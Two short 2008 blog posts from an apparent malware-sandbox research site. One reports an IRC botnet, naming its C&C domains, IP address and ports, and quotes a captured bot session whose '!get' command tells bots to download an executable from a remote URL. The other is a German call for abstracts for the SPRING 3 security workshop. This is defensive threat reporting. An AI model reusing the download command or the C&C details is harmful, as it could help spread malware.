Annoying Botnets

Saturday, May 31. 2008
At cwsandbox.org, we receive quite a few binaries these days. However, we receive also lots of "uninteresting" files like hundreds of copies of Allaple, which we basically filter out in an automated way.
A specific annoying family of malware sample we receive a lot are all the bots related to the two domains proxim.ircgalaxy.pl and ircd.zief.pl. We receive tens or even hundreds of sample of these bots per day. Both domains map to the same IP address 85.114.137.60, which belongs to a co-location provider in Germany. The provider did not yet react to abuse complaints, thus I publish a few more details about this botnet - perhaps someone else can help. The botnet related to the first domains has the Command & Control server listening on TCP port 65520, while the second botnet has the C&C server at TCP port 80. An example communication of the bots looks like:
NICK rzyaaqgs
USER f020501 . . :-Service Pack 2
JOIN &virtu
:* PRIVMSG rzyaaqgs :!get http://dl2.teenpassage.com/~grander/unpr.exe

SPRING 3

Saturday, May 31. 2008
This is a Call for Abstracts for a German workshop for young researchers, thus the following text is in German only.

---------------------------------------------------------------
Arbeitest Du auf dem Gebiet der Reaktiven Sicherheit?

Willst Du Dich mit anderen fachlich austauschen?

Dann haben wir etwas für Dich: Die Fachgruppe SIDAR ("Security - Intrusion Detection and Response") der Gesellschaft für Informatik e.V. veranstaltet die dritte SPRING. SPRING bietet Nachwuchswissenschaftlern auf dem Gebiet der Reaktiven Sicherheit eine Plattform, um themenbezogen Kontakte über die eigene Universität hinaus zu knüpfen. In diesem Jahr findet SPRING am 8. August an der Universität Mannheim statt.

Wir laden Diplomanden und Doktoranden ein, ihre Beiträge zu präsentieren. Die Vorträge können ein breites Spektrum abdecken, von noch laufenden Projekten, die ggf. erstmals einem breiteren Publikum vorgestellt werden, bis zu abgeschlossenen Forschungsarbeiten, die zeitnah auch auf Konferenzen präsentiert wurden bzw. werden sollen oder einen Schwerpunkt der eigenen Diplomarbeit oder Dissertation bilden.

Das Themenspektrum der Reaktiven Sicherheit beinhaltet:
  • Verwundbarkeitsanalyse
  • Intrusion Detection
  • Malware
  • Incident Management
  • Forensik

Mehr Informationen: SPRING 3 Webseite.
---------------------------------------------------------------